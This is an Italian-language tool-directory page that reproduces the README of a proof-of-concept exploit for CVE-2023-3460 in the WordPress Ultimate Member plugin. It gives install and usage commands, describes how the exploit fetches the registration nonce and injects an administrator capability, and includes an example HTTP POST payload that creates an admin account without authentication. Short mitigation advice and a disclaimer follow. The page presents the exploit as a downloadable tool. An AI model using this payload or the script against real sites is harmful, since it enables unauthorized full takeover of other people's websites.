Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-3460 — Exploit proof-of-concept per CVE-2023-3460, una vulnerabilità di escalation dei privilegi in WordPress Ultimate Member. Crea un account amministratore tramite una richiesta di registrazione modificata. Solo per test autorizzati. | Kitploit
Strumenti/GitHubGitHub/gurjotexpert/cve-2023-3460
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubgurjotexpert/cve-2023-3460

CVE-2023-3460

Exploit proof-of-concept per CVE-2023-3460, una vulnerabilità di escalation dei privilegi in WordPress Ultimate Member. Crea un account amministratore tramite una richiesta di registrazione modificata. Solo per test autorizzati.

Vedi Repository
111 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2023-3460 - Exploit di Escalation dei Privilegi di Ultimate Member per WordPress

Questo è un proof-of-concept (PoC) per CVE-2023-3460, una vulnerabilità critica nel plugin WordPress Ultimate Member. Consente a utenti non autenticati di elevare i propri privilegi ad Amministratore tramite una richiesta di registrazione malevola.

🔥 Impatto: Compromissione completa del sito tramite creazione non autorizzata di account amministratore.


📌 Dettagli della Vulnerabilità

  • Plugin interessato: Ultimate Member
  • Versioni affette: ≤ 2.6.6
  • Versione corretta: 2.6.7
  • Tipo di Exploit: Escalation dei privilegi tramite abuso della registrazione
  • Autenticazione richiesta: ❌ No
  • CVE: CVE-2023-3460

⚙️ Requisiti

  • Python 3
  • Libreria requests
  • Libreria urllib3
  • Libreria beautifulsoup4

Installa i requisiti:

root@kitploit:~
pip3 install requests urllib3 beautifulsoup4

🧪 Utilizzo dell'Exploit

root@kitploit:~
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> 

✅ Esempio:

root@kitploit:~
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 

📥 Caratteristiche dello Script Exploit

  • Recupera il nonce CSRF (_wpnonce) dalla pagina di registrazione
  • Bypassa la validazione del modulo
  • Inietta wp_capabilities con il ruolo administrator
  • Crea un nuovo utente amministratore senza autenticazione

🔐 Payload di Esempio dell'Exploit

root@kitploit:~
POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>

🛡️ Mitigazione

  • Aggiorna il plugin Ultimate Member alla v2.6.7 o superiore
  • Disabilita la registrazione aperta se non necessaria
  • Monitora i log di creazione utente per attività sospette

📚 Riferimenti

  • 🔗 Avviso Patchstack
  • 🔗 CVE-2023-3460 su NVD

⚠️ Disclaimer

Questo script è fornito solo a scopo di test educativo e autorizzato. Lo sfruttamento non autorizzato dei sistemi è illegale e non etico. Utilizzalo solo su sistemi di tua proprietà o per i quali hai il permesso di test.


👨‍💻 Autore

  • 💀 [GURJOT SINGH]
  • 🔒 [LinkedIn: https://in.linkedin.com/in/gurjot-singh-8198b3220]
Scarica lo strumento